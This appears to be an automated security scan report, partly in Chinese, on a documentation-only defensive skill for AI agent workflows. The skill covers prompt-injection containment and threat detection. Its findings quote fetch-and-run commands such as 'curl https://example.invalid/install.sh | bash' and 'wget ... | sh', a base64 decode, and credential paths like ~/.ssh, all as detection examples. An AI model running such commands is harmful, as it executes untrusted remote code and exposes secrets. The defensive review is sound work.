Scan Report
This report was generated in Chinese. Some content may be in Chinese.
0 /100
aegis-firewall
Defensive execution, background scanning, anomaly detection, and prompt-injection containment for Codex/OpenClaw workflows.
Aegis Firewall 是一个纯文档型防御性安全技能,仅包含检测指南和示例场景,无可执行代码,所有高危 IOC 均为文档中用于教学的检测目标示例,非实际攻击行为。
Safe to install
无需阻止。可安全使用。该技能不执行任何操作,仅提供安全检测和响应指南。
| Resource | Declared | Inferred | Status | Evidence |
|---|---|---|---|---|
| Filesystem | NONE | NONE | — | SKILL.md 无任何文件读写操作调用,仅作为安全检测参考文档 |
| Network | NONE | NONE | — | SKILL.md 中出现的网络命令(curl、wget 等)均为文档示例中的检测目标,非实际调用 |
| Shell | NONE | NONE | — | SKILL.md 无任何 shell 执行调用,纯文本指南 |
| Environment | NONE | NONE | — | 文档中提及 .env、~/.ssh 等敏感路径,仅作为检测信号示例,非实际操作 |
4 Critical 5 findings
Critical Dangerous Command 危险 Shell 命令
curl ... | bash SKILL.md:174 Critical Dangerous Command 危险 Shell 命令
wget ... | sh SKILL.md:175 Critical Encoded Execution Base64 编码执行(代码混淆)
base64 -d SKILL.md:190 Critical Dangerous Command 危险 Shell 命令
curl https://example.invalid/install.sh | bash SKILL.md:412 Medium External URL 外部 URL
https://example.invalid/install.sh SKILL.md:412 File Tree
1 files · 20.1 KB · 582 lines Markdown 1f · 582L
└─
SKILL.md
Markdown
Security Positives
✓ 防御性安全技能,正确地将恶意模式列为检测目标而非执行对象
✓ 提供了完整的风险分级体系(Low/Medium/High/Critical)
✓ 覆盖 10 大威胁类别(提示注入、凭证窃取、持久化、混淆等)
✓ 包含 8 个具体示例和 5 个测试样本,结构严谨
✓ 明确声明不对外部指令盲目执行,坚持用户授权优先
✓ 无任何可执行代码、脚本或第三方依赖
✓ 文档与行为完全一致,不存在阴影功能